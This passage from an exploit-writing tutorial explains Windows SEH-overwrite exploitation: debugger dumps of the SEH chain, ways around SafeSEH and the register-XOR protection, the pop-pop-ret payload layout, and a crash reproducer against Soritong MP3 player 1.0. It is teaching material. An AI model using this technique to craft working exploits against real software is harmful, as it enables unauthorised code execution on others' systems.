77C01495     0x77c01495 : "64A100000000" |  {PAGE_EXECUTE_READ} [VERSION.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\VERSION.dll)
77FE1C06     0x77fe1c06 : "64A100000000" |  {PAGE_EXECUTE_READ} [Secur32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\Secur32.dll)
7E4185C5     0x7e4185c5 : "64A100000000" |  {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
77121734     0x77121734 : "64A100000000" | ascii {PAGE_EXECUTE_READ} [OLEAUT32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\OLEAUT32.dll)
77143A38     0x77143a38 : "64A100000000" | asciiprint,ascii {PAGE_EXECUTE_READ} [OLEAUT32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\OLEAUT32.dll)
0100756D     0x0100756d : "64A100000000" | null {PAGE_EXECUTE_READ} [notepad.exe] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v5.1.2600.5512 (C:\Documents and Settings\lab\Desktop\notepad.exe)
774FCFB4     0x774fcfb4 : "64A100000000" |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
763B66DB     0x763b66db : "64A100000000" |  {PAGE_EXECUTE_READ} [comdlg32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\comdlg32.dll)
0BADF00D   ... Please wait while I'm processing all remaining results and writing everything to file...
0BADF00D   [+] Done. Only the first 20 pointers are shown here. For more pointers, open C:\logs\notepad\find.txt...
0BADF00D       Found a total of 35 pointers
0BADF00D
0BADF00D   [+] This mona.py action took 0:00:00.803000

Alternatively, you can use a OllyDBG plugin called OllyGraph to create a Function Flowchart.
The bottom of the SEH chain is indicated by FFFFFFFF. This will trigger an improper termination of the program (and the OS handler will kick in)
Quick example : compile the following source code (sehtest.exe) and open the executable in windbg. Do NOT start the application yet, leave it in a paused state :

#include<stdio.h>
#include<string.h>
#include<windows.h>

int ExceptionHandler(void);

int main(int argc,char *argv[]){

    char temp[512];

    printf("Application launched");

    __try {

        strcpy(temp,argv[1]);

    }
    __except ( ExceptionHandler() )
    {
            //
    }

    return 0;
}

int ExceptionHandler(void){
    printf("Exception");
    return 0;
}

look at the loaded modules

Executable search path is: 
ModLoad: 00400000 0040b000   image00400000
ModLoad: 7c900000 7c9af000   ntdll.dll
ModLoad: 7c800000 7c8f6000   C:\WINDOWS\system32\kernel32.dll

The application sits between 0x00400000 and 0x0040b000.
Search this area for the opcode:

0:000> s 00400000 l 0040b000 64 A1
0040100f  64 a1 00 00 00 00 50 64-89 25 00 00 00 00 81 ec  d.....Pd.%......
004012b3  64 a1 00 00 00 00 50 64-89 25 00 00 00 00 83 ec  d.....Pd.%......
00404f8d  64 a1 00 00 00 00 50 64-89 25 00 00 00 00 83 ec  d.....Pd.%......
004051dc  64 a1 00 00 00 00 50 64-89 25 00 00 00 00 83 ec  d.....Pd.%......
00406028  64 a1 80 7c 7b cc 81 7c-98 2f 81 7c 27 cd 80 7c  d..|{..|./.|'..|

This is proof that an exception handler is registered. Dump the TEB :

0:000> d fs:[0]
003b:00000000  0c fd 12 00 00 00 13 00-00 e0 12 00 00 00 00 00 ................
003b:00000010  00 1e 00 00 00 00 00 00-00 d0 fd 7f 00 00 00 00 ................
003b:00000020  a8 0c 00 00 ac 0c 00 00-00 00 00 00 00 00 00 00 ................
003b:00000030  00 e0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000040  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000060  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000070  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

The pointer points to 0x0012fd0c (begin of SEH chain). When looking at that area, we see:

0:000> d 0x0012fd0c
0012fd0c  ff ff ff ff 00 e9 90 7c-10 b0 91 7c 01 00 00 00  .......|...|....
0012fd1c  00 00 00 00 37 e4 90 7c-30 fd 12 00 00 00 90 7c  ....7..|0......|
0012fd2c  00 00 00 00 17 00 01 00-00 00 00 00 00 00 00 00  ................
0012fd3c  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
0012fd4c  b8 da 2b f5 84 e4 3b f8-b0 b6 08 82 38 e2 f3 81  ..+...;.....8...
0012fd5c  92 e4 3b f8 48 e2 f3 81-18 9b 3d 82 98 d1 25 82  ..;.H.....=...%.
0012fd6c  01 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
0012fd7c  00 00 00 00 00 00 00 00-00 00 00 00 01 00 00 00  ................

ff ff ff ff indicates the end of the SEH chain. That’s normal, because the application is not started yet. (Windbg is still paused)
If you have the Ollydbg plugin Ollygraph installed, you could open the executable in ollydbg and create the graph, which should indicate if an exception handler is installed or not.
When we run the application (F5 or ‘g’), we see this :

0:000> d fs:[0]
003b:00000000  70 ff 12 00 00 00 13 00-00 e0 12 00 00 00 00 00 p...............
003b:00000010  00 1e 00 00 00 00 00 00-00 d0 fd 7f 00 00 00 00 ................
003b:00000020  a8 0c 00 00 ac 0c 00 00-00 00 00 00 00 00 00 00 ................
003b:00000030  00 e0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000040  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000060  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000070  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

0:000> d 0x0012ff70
0012ff70  b0 ff 12 00 cc 11 40 00-b0 60 40 00 00 00 00 00  ......@..`@.....
0012ff80  c0 ff 12 00 58 13 40 00-01 00 00 00 10 0e 33 00  ....X.@.......3.
0012ff90  68 0e 33 00 ee f6 dd 00-84 f7 dd 00 00 e0 fd 7f  h.3.............
0012ffa0  01 00 00 00 06 00 00 00-94 ff 12 00 9f 1c 58 80  ..............X.
0012ffb0  e0 ff 12 00 cc 11 40 00-c0 60 40 00 00 00 00 00  ......@..`@.....
0012ffc0  f0 ff 12 00 67 70 81 7c-ee f6 dd 00 84 f7 dd 00  ....gp.|........
0012ffd0  00 e0 fd 7f b8 b6 54 80-c8 ff 12 00 10 19 ee 81  ......T.........
0012ffe0  ff ff ff ff c0 9a 83 7c-70 70 81 7c 00 00 00 00  .......|pp.|....

The TEB for the main function is now set up. The SEH chain for the main function points at 0x0012ff70, where the exception handler is listed and will point to the exception handler function (0x0012ffb0)
In Immunity Debugger, you can see the seh chain more easily:

SEH chain of main thread
Address    SE handler
0012FF70   sehtest.004013E0
0012FFB0   sehtest.004013E0
0012FFE0   kernel32.7C839AC0

(There is a similar view in Immunity Debugger – just click "View" and select "SEH Chain")
Stack:

0012FF70   0012FFB0  ▒▒.  Pointer to next SEH record
0012FF74   004013E0  ▒@.  SE handler
0012FF78   00422038  8 B.  sehtest.00422038
0012FF7C   00000000  ....
0012FF80  /0012FFC0  ▒▒.
0012FF84  |004015A9  ▒@.  RETURN to sehtest.<ModuleEntryPoint>+0E9 from sehtest.0040100A
0012FF88  |00000001  ...
0012FF8C  |00330E10  3.
0012FF90  |00330E98  ▒3.
0012FF94  |0069006E  n.i.
0012FF98  |00790074  t.y.
0012FF9C  |7FFDF000  .▒▒
0012FFA0  |00000006  ...
0012FFA4  |F5487D04  }H▒
0012FFA8  |0012FF94  ▒▒.
0012FFAC  |80581C9F  ▒X▒
0012FFB0  |0012FFE0  ▒▒.  Pointer to next SEH record
0012FFB4  |004013E0  ▒@.  SE handler
0012FFB8  |00422160  `!B.  sehtest.00422160
0012FFBC  |00000000  ....
0012FFC0  \0012FFF0  ▒▒.
0012FFC4   7C817067  gp▒|  RETURN to kernel32.7C817067
0012FFC8   0069006E  n.i.
0012FFCC   00790074  t.y.
0012FFD0   7FFDF000  .▒▒
0012FFD4   8054B6B8  ▒▒T▒
0012FFD8   0012FFC8  ▒▒.
0012FFDC   81D3F300  .▒Ӂ
0012FFE0   FFFFFFFF  ▒▒▒▒  End of SEH chain
0012FFE4   7C839AC0  ▒▒▒|  SE handler
0012FFE8   7C817070  pp▒|  kernel32.7C817070
0012FFEC   00000000  ....
0012FFF0   00000000  ....
0012FFF4   00000000  ....
0012FFF8   004014C0  ▒@.  sehtest.<ModuleEntryPoint>
0012FFFC   00000000  ....

Here we can see a pointer to our Exception Handler function ExceptionHandler() (0x004013E0)
Anyways, as you can see in the explanation above the example, and in the last screenshot, exception handlers are connected/linked to each other. They form a linked list chain on the stack, and sit relatively close to the bottom of the stack. (SEH chain). When an exception occurs, Windows ntdll.dll kicks in, retrieves the head of the SEH chain (sits at the top of TEB/TIB remember), walks through the list and tries to find the suitable handler. If no handler is found the default Win32 handler will be used (at the bottom of the stack, the one after FFFFFFFF).
We see the first SE Handler record at 0012FF70. The next SEH address points to the next SEH record (0012FFB0). The current handler points at 7C839AC0. It looks like this is some kind of OS handler (the pointers points into an OS module)
Then, the second SEH record entry in the chain (at 0012FFB0) has the following values : next SEH points to 0012FFE0. The handler points at 004013E0. This address is part of the executable, so it looks like this is an application handler.
Finally, the last SEH record in the chain (at 0012FFE0) has FFFFFFFF in nseh. This means that this is the last entry in the chain. The handler points at 7C839AD8, which is an OS handler again.
So, putting all pieces together, the entire SEH chain looks like this :

                                              Stack
    ------------------------         --------------------------
    |   TEB                |         |                        |
    |   FS[0]:0x0012FF70 ------------|  0x0012FF70:0x0012FFB0: next SEH record --------|
    |                      |         |  0x0012FF74:0x004013E0: SE handler              |
    ------------------------         --------------------------                        |
                                                                                       |
                    |------------------------------------------------------------------|
                    |
                    |                --------------------------
                    |                |                        |
                    |--------------->|  0x0012FFB0:0x0012FFE0: next SEH record --------|
                                     |  0x0012FFB4:0x004013E0: SE handler              |
                                     --------------------------                        |
                                                                                       |
                    |------------------------------------------------------------------|
                    |
                    |                --------------------------
                    |                |                        |
                    |--------------->|  0x0012FFB0:0xFFFFFFFF: next SEH record (end of chain)
                                     |  0x0012FFB4:0x7C839AC0: SE handler
                                     --------------------------

You can read more about SEH in Matt Pietrek’s excellent article from 1997 : http://www.microsoft.com/msj/0197/exception/exception.aspx.

Changes in Windows XP SP1 with regards to SEH, and the impact of GS/DEP/SafeSEH and other protection mechanisms on exploit writing.

XOR

In order to be able to build an exploit based on SEH overwrite, we will need to make a distinction between Windows XP pre-SP1 and SP1 and up. Since Windows XP SP1, before the exception handler is called, all registers are XORed with each other, making them all contain 0x00000000, which means you won’t be able to find a reference to your payload in one of the registers. In other words, maybe you’ll see that one or more registers point at your payload at the first chance exception, but when the EH kicks in, these registers are cleared again (so you cannot jump to them directly in order to execute your shellcode). We’ll talk about this later on.

DEP & Stack Cookies

On top of that, Stack Cookies (via C++ compiler options) and DEP (Data Execution Prevention) were introduced (Windows XP SP2 and Windows 2003) . I will write an entire post on Stack cookies and DEP. In sort, you only need to remember that these two techniques can make it significantly harder to build exploits.

DEP & Stack Cookies

SafeSEH

Some additional protection was added to compilers, helping to stop the abuse of SEH overwrites. This protection mechanism is active for all modules that are compiled with /safeSEH.

Windows 2003

Under Windows 2003 server, more protection was added. I’m not going to discuss these protections in this post (check tutorial series part 6 for more info), because things would start to get too complex at this point. As soon as you mastered this tutorial, you will be ready to look at tutorial part 6 :-).

XOR, SafeSEH,…. but how can we then use the SEH to jump to shellcode ?

There is a way around the XOR 0x00000000 protection and the SafeSEH protections. Since you cannot simply jump to a register (because registers are xored), a call to a series of instructions in a dll will be needed.

(You should try to avoid using a call from the memory space of an OS specific dll, but rather use an address from an application dll instead in order to make the exploit reliable (assuming that this dll is not compiled with safeSEH). That way, the address will be almost always the same, regardless of the OS version. But if there are no DLL’s, and there is a non safeseh OS module that is loaded, and this module contains a call to these instructions, then it will work too.)

The theory behind this technique is : If we can overwrite the pointer to the SE handler that will be used to deal with a given exception, and we can cause the application to throw another exception (a forced exception), we should be able to get control by forcing the application to jump to your shellcode (instead of to the real exception handler function). The series of instructions that will trigger this, is POP POP RET. The OS will understand that the exception handling routine has been executed and will move to the next SEH (or to the end of the SEH chain). The pointer to this instruction should be searched for in loaded dll’s/exe’s, but not in the stack (again, the registers will be made unusable). (You could try to use ntdll.dll or an application-specific dll).

One quick sidenote : there is an excellent Ollydbg plugin called OllySSEH, which will scan the process loaded modules and will indicate if they were compiled with SafeSEH or not. It is important to scan the dll’s and to use a pop/pop/ret address from a module that is not compiled with SafeSEH. If you are using Immunity Debugger, then you can use the pvefindaddr plugin to look for seh (p/p/r) pointers. This plugin will automatically filter invalid pointers (from safeseh modules etc) and will also look for all p/p/r combinations. I highly recommend using Immunity Debugger and pvefindaddr.

Normally, the pointer to the next SEH record contains an address. But in order to build an exploit, we need to overwrite it with small jumpcode to the shellcode (which should sit in the buffer right after overwriting the SE Handler). The pop pop ret sequence will make sure this code gets executed.
In other words, the payload must do the following things

cause an exception. Without an exception, the SEH handler (the one you have overwritten/control) won’t kick in
overwrite the pointer to the next SEH record with some jumpcode (so it can jump to the shellcode)
overwrite the SE handler with a pointer to an instruction that will bring you back to next SEH and execute the jumpcode.

The shellcode should be directly after the overwritten SE Handler. Some small jumpcode contained in the overwritten “pointer to next SEH record” will jump to it).

    --------------------------
    |  Access violation /    |
    | exception is triggered |
    --------------------------
      |
      |
      | <1>. Exception Handler kicks in
      |                                                     <4>. Pointer to next SEH was overwritten
      |   --------------------------------------                 with jmp to shellcode.
      |   |  ------------------------------    |                  ------------------
  ---------->| Pointer to next SEH record |-----------------------|  Shellcode     |
  |   |   |  ------------------------------    |                  ------------------
  |   |   |                                    |
  |   |   |  ------------------------------    |
  |   |----->|  Current SE Handler        |    |
  |       |  ------------------------------    |
  |       |-----------------|------------------|
  |                         |
  |                         |   <2>. Current SE Handler was overwritten and
  |                        \|/       points to pop,pop,ret
  |                         |
  |        --------------------------------
  |------->|    POP,POP,RET               |
           --------------------------------

        <3>. pop,pop,ret. During prologue of exception handler,
             address of pointers to next SEH was put on stack at
             ESP+8. pop pop ret puts this address in EIP and allows
             execution of the code at the address of "pointer to next SEH".

As explained at the top of this post, there could be no exception handlers in the application (in that case, the default OS Excecption Handler takes over, and you will have to overwrite a lot of data, all the way to the bottom of the stack), or the application uses its own exception handlers (and in that case you can choose how far ‘deep’ want to overwrite).
A typical payload will look like this:

[Junk][nSEH][SEH][Nop-Shellcode]

Where nSEH = the jump to the shellcode, and SEH is a reference to a pop pop ret.
Make sure to pick a universal address for overwriting the SEH. Ideally, try to find a good sequence in one of the dll’s from the application itself.
Before looking at building an exploit, we’ll have a look at how Ollydbg and windbg can help tracing down SEH handling (and assist you with building the correct payload).
The test case in this post is based on a vulnerability that was released last week (july 20th 2009).

See SEH in action – Immunity Debugger

When performing a regular stack based buffer overflow, we overwrite the return address (EIP) and make the application jump to our shellcode. When doing a SEH overflow, we will continue overwriting the stack after overwriting EIP, so we can overwrite the default exception handler as well. How this will allow us to exploit a vulnerability, will become clear soon.
Let’s use a vulnerability in Soritong MP3 player 1.0, made public on july 20th 2009.
The vulnerability points out that an invalid skin file can trigger the overflow. We’ll use the following basic perl script to create a file called UI.txt in the skin\default folder :

>>> fpath = "ui.txt"
>>> data = "A" * 5000
>>> f = open(fpath, "w")
>>> f.write(data)
>>> f.close()

Now open soritong. The application dies silently (probably because of the exception handler that has kicked in, and has not been able to find a working SEH address (because we have overwritten the address).
FIrst, we’ll work with Ollydbg/Immunity to clearly show you the stack and SEH chain . Open Ollydbg/Immunity Debugger and open the soritong.exe executable. Press the “play” button to run the application. Shortly after, the application dies and stops at this screen:

The application has died at 0x00422E33. At that point, ESP points at 0x0012DA14. Further down the stack (at 0x0012DA6C), we see FFFFFFFF, which looks likeindicates the end of the SEH chain. Directly below 0x0012DA14, we see 7E41882A, which is the address of the default SE handler for the application. This address sits in the address space of user32.dll.

A couple of addresses higher on the stack, we can see some other exception handlers, but all of them also belong to the OS (ntdll in this case). So it looks like this application (or at least the function that was called and caused the exception) does not have its own exception handler routine.

When we look at the threads (View – Threads) select the first thread (which refers to the start of the application), right click and choose ‘dump thread data block’, we can see the Pointer to the SEH chain :

So the exception handler worked. We caused an exception (by building a malformed ui.txt file). The application jumped to the SEH chain (at 0x0012DF64).
Go to “View” and open “SEH chain”

SEH chain of main thread
Address    SE handler
0012FD64   41414141
41414141   *** CORRUPT ENTRY ***

The SE handler has been overwritten with 4 A’s. Now it becomes interesting. When the exception is handled, EIP will be overwritten with the address in the SE Handler. Since we can control the value in the handler, we can have it execute our own code.

See SEH in action – Windbg

When we now do the same in windbg, this is what we see : Close Ollydbg, open windbg and open the soritong.exe file.
The debugger first breaks (it puts a breakpoint before executing the file). Type command g (go) and press return. This will launch the application. (Alternatively, press F5)

Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: "C:\Program Files\SoriTong\SoriTong.exe"
Symbol search path is: SRV*C:\localsymbols*http://msdl.microsoft.com/download/symbols;cache*c:\localsymbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00400000 004de000   SoriTong.exe
ModLoad: 7c900000 7c9af000   ntdll.dll
ModLoad: 7c800000 7c8f6000   C:\WINDOWS\system32\kernel32.dll
ModLoad: 77dd0000 77e6b000   C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f02000   C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fe0000 77ff1000   C:\WINDOWS\system32\Secur32.dll
ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\VERSION.dll
ModLoad: 73000000 73026000   C:\WINDOWS\system32\WINSPOOL.DRV
ModLoad: 77f10000 77f59000   C:\WINDOWS\system32\GDI32.dll
ModLoad: 7e410000 7e4a1000   C:\WINDOWS\system32\USER32.dll
ModLoad: 77c10000 77c68000   C:\WINDOWS\system32\msvcrt.dll
ModLoad: 5d090000 5d12a000   C:\WINDOWS\system32\COMCTL32.dll
ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\COMDLG32.dll
ModLoad: 7c9c0000 7d1d7000   C:\WINDOWS\system32\SHELL32.dll
ModLoad: 77f60000 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 76b40000 76b6d000   C:\WINDOWS\system32\WINMM.dll
ModLoad: 774e0000 7761d000   C:\WINDOWS\system32\OLE32.dll
ModLoad: 77120000 771ab000   C:\WINDOWS\system32\OLEAUT32.dll
(e0c.e10): Break instruction exception - code 80000003 (first chance)
eax=00241eb4 ebx=7ffdd000 ecx=00000001 edx=00000002 esi=00241f48 edi=00241eb4
eip=7c90120e esp=0012fb20 ebp=0012fc94 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!DbgBreakPoint:
7c90120e cc              int     3
0:000> g
ModLoad: 773d0000 774d3000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 76c30000 76c5e000   C:\WINDOWS\system32\WINTRUST.dll
ModLoad: 77a80000 77b15000   C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000   C:\WINDOWS\system32\MSASN1.dll
ModLoad: 76c90000 76cb8000   C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d10000 72d18000   C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000   C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000   C:\WINDOWS\system32\midimap.dll
ModLoad: 10000000 10094000   C:\Program Files\SoriTong\Player.dll
ModLoad: 42100000 42129000   C:\WINDOWS\system32\wmaudsdk.dll
ModLoad: 00eb0000 00eff000   C:\WINDOWS\system32\DRMClien.DLL
ModLoad: 5bc60000 5bc9f000   C:\WINDOWS\system32\strmdll.dll
ModLoad: 71ad0000 71ad9000   C:\WINDOWS\system32\WSOCK32.dll
ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000   C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 76eb0000 76edf000   C:\WINDOWS\system32\TAPI32.dll
ModLoad: 76e80000 76e8e000   C:\WINDOWS\system32\rtutils.dll
(e0c.e10): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00130000 ebx=00000003 ecx=00000041 edx=00000041 esi=0017d504 edi=0012fd64
eip=00422e33 esp=0012da14 ebp=0012fd38 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
*** WARNING: Unable to verify checksum for SoriTong.exe
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for SoriTong.exe -
SoriTong!TmC13_5+0x3ea3:
00422e33 8810            mov     byte ptr [eax],dl          ds:0023:00130000=41
0:000> d esp
0012da14  74 c2 aa 00 00 00 00 00-00 00 00 00 00 00 00 00  t...............
0012da24  94 da 12 00 00 00 00 00-38 52 15 00 00 00 00 00  ........8R......
0012da34  00 00 00 00 00 00 00 00-00 00 00 00 64 6a 94 7c  ............dj.|
0012da44  47 28 91 7c 00 eb 12 00-00 00 00 00 01 a0 f2 00  G(.|............
0012da54  01 00 00 00 24 da 12 00-41 9a 94 7c d4 ed 12 00  ....$...A..|....
0012da64  8f 04 44 7e 30 88 41 7e-ff ff ff ff 2a 88 41 7e  ..D~0.A~....*.A~
0012da74  7b 92 42 7e 79 b8 00 00-b8 da 12 00 d8 00 0b 5d  {.B~y..........]
0012da84  94 da 12 00 bf fe ff ff-b8 f0 12 00 58 8b 15 00  ............X...

ffffffff here indicates the end of the SEH chain. When we run !analyze -v, we get this :

0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************


FAULTING_IP:
SoriTong!TmC13_5+3ea3
00422e33 8810            mov     byte ptr [eax],dl

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00422e33 (SoriTong!TmC13_5+0x00003ea3)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 00130000
Attempt to write to address 00130000

FAULTING_THREAD:  00000e10

DEFAULT_BUCKET_ID:  INVALID_POINTER_WRITE

PROCESS_NAME:  SoriTong.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_PARAMETER1:  00000001

EXCEPTION_PARAMETER2:  00130000

WRITE_ADDRESS:  00130000

FOLLOWUP_IP:
SoriTong!TmC13_5+3ea3
00422e33 8810            mov     byte ptr [eax],dl

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  70

APPLICATION_VERIFIER_FLAGS:  0

PRIMARY_PROBLEM_CLASS:  INVALID_POINTER_WRITE

BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE

IP_ON_HEAP:  41414141

IP_IN_FREE_BLOCK: 41414141

FRAME_ONE_INVALID: 1

LAST_CONTROL_TRANSFER:  from 41414141 to 00422e33

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0012fd38 41414141 41414141 41414141 41414141 SoriTong!TmC13_5+0x3ea3
0012fd3c 41414141 41414141 41414141 41414141 0x41414141
0012fd40 41414141 41414141 41414141 41414141 0x41414141
0012fd44 41414141 41414141 41414141 41414141 0x41414141
0012fd48 41414141 41414141 41414141 41414141 0x41414141
0012fd4c 41414141 41414141 41414141 41414141 0x41414141
0012fd50 41414141 41414141 41414141 41414141 0x41414141
0012fd54 41414141 41414141 41414141 41414141 0x41414141
0012fd58 41414141 41414141 41414141 41414141 0x41414141
0012fd5c 41414141 41414141 41414141 41414141 0x41414141
0012fd60 41414141 41414141 41414141 41414141 0x41414141
0012fd64 41414141 41414141 41414141 41414141 0x41414141
0012fd68 41414141 41414141 41414141 41414141 0x41414141
0012fd6c 41414141 41414141 41414141 41414141 0x41414141
0012fd70 41414141 41414141 41414141 41414141 0x41414141
0012fd74 41414141 41414141 41414141 41414141 0x41414141
0012fd78 41414141 41414141 41414141 41414141 0x41414141
0012fd7c 41414141 41414141 41414141 41414141 0x41414141
0012fd80 41414141 41414141 41414141 41414141 0x41414141
0012fd84 41414141 41414141 41414141 41414141 0x41414141
0012fd88 41414141 41414141 41414141 41414141 0x41414141
0012fd8c 41414141 41414141 41414141 41414141 0x41414141
0012fd90 41414141 41414141 41414141 41414141 0x41414141
0012fd94 41414141 41414141 41414141 41414141 0x41414141
0012fd98 41414141 41414141 41414141 41414141 0x41414141
0012fd9c 41414141 41414141 41414141 41414141 0x41414141
0012fda0 41414141 41414141 41414141 41414141 0x41414141
0012fda4 41414141 41414141 41414141 41414141 0x41414141
0012fda8 41414141 41414141 41414141 41414141 0x41414141
0012fdac 41414141 41414141 41414141 41414141 0x41414141
0012fdb0 41414141 41414141 41414141 41414141 0x41414141
0012fdb4 41414141 41414141 41414141 41414141 0x41414141
0012fdb8 41414141 41414141 41414141 41414141 0x41414141
0012fdbc 41414141 41414141 41414141 41414141 0x41414141
0012fdc0 41414141 41414141 41414141 41414141 0x41414141
0012fdc4 41414141 41414141 41414141 41414141 0x41414141
0012fdc8 41414141 41414141 41414141 41414141 0x41414141
0012fdcc 41414141 41414141 41414141 41414141 0x41414141
0012fdd0 41414141 41414141 41414141 41414141 0x41414141
0012fdd4 41414141 41414141 41414141 41414141 0x41414141
0012fdd8 41414141 41414141 41414141 41414141 0x41414141
0012fddc 41414141 41414141 41414141 41414141 0x41414141
0012fde0 41414141 41414141 41414141 41414141 0x41414141
0012fde4 41414141 41414141 41414141 41414141 0x41414141
0012fde8 41414141 41414141 41414141 41414141 0x41414141
0012fdec 41414141 41414141 41414141 41414141 0x41414141
0012fdf0 41414141 41414141 41414141 41414141 0x41414141
0012fdf4 41414141 41414141 41414141 41414141 0x41414141
0012fdf8 41414141 41414141 41414141 41414141 0x41414141
0012fdfc 41414141 41414141 41414141 41414141 0x41414141
0012fe00 41414141 41414141 41414141 41414141 0x41414141
0012fe04 41414141 41414141 41414141 41414141 0x41414141
0012fe08 41414141 41414141 41414141 41414141 0x41414141
0012fe0c 41414141 41414141 41414141 41414141 0x41414141
0012fe10 41414141 41414141 41414141 41414141 0x41414141
0012fe14 41414141 41414141 41414141 41414141 0x41414141
0012fe18 41414141 41414141 41414141 41414141 0x41414141
0012fe1c 41414141 41414141 41414141 41414141 0x41414141
0012fe20 41414141 41414141 41414141 41414141 0x41414141
0012fe24 41414141 41414141 41414141 41414141 0x41414141
0012fe28 41414141 41414141 41414141 41414141 0x41414141
0012fe2c 41414141 41414141 41414141 41414141 0x41414141
0012fe30 41414141 41414141 41414141 41414141 0x41414141
0012fe34 41414141 41414141 41414141 41414141 0x41414141
0012fe38 41414141 41414141 41414141 41414141 0x41414141
0012fe3c 41414141 41414141 41414141 41414141 0x41414141
0012fe40 41414141 41414141 41414141 41414141 0x41414141
0012fe44 41414141 41414141 41414141 41414141 0x41414141
0012fe48 41414141 41414141 41414141 41414141 0x41414141
0012fe4c 41414141 41414141 41414141 41414141 0x41414141
0012fe50 41414141 41414141 41414141 41414141 0x41414141
0012fe54 41414141 41414141 41414141 41414141 0x41414141
0012fe58 41414141 41414141 41414141 41414141 0x41414141
0012fe5c 41414141 41414141 41414141 41414141 0x41414141
0012fe60 41414141 41414141 41414141 41414141 0x41414141
0012fe64 41414141 41414141 41414141 41414141 0x41414141
0012fe68 41414141 41414141 41414141 41414141 0x41414141
0012fe6c 41414141 41414141 41414141 41414141 0x41414141
0012fe70 41414141 41414141 41414141 41414141 0x41414141
0012fe74 41414141 41414141 41414141 41414141 0x41414141
0012fe78 41414141 41414141 41414141 41414141 0x41414141
0012fe7c 41414141 41414141 41414141 41414141 0x41414141
0012fe80 41414141 41414141 41414141 41414141 0x41414141
0012fe84 41414141 41414141 41414141 41414141 0x41414141
0012fe88 41414141 41414141 41414141 41414141 0x41414141
0012fe8c 41414141 41414141 41414141 41414141 0x41414141
0012fe90 41414141 41414141 41414141 41414141 0x41414141
0012fe94 41414141 41414141 41414141 41414141 0x41414141
0012fe98 41414141 41414141 41414141 41414141 0x41414141
0012fe9c 41414141 41414141 41414141 41414141 0x41414141
0012fea0 41414141 41414141 41414141 41414141 0x41414141
0012fea4 41414141 41414141 41414141 41414141 0x41414141
0012fea8 41414141 41414141 41414141 41414141 0x41414141
0012feac 41414141 41414141 41414141 41414141 0x41414141
0012feb0 41414141 41414141 41414141 41414141 0x41414141
0012feb4 41414141 41414141 41414141 41414141 0x41414141
0012feb8 41414141 41414141 41414141 41414141 0x41414141
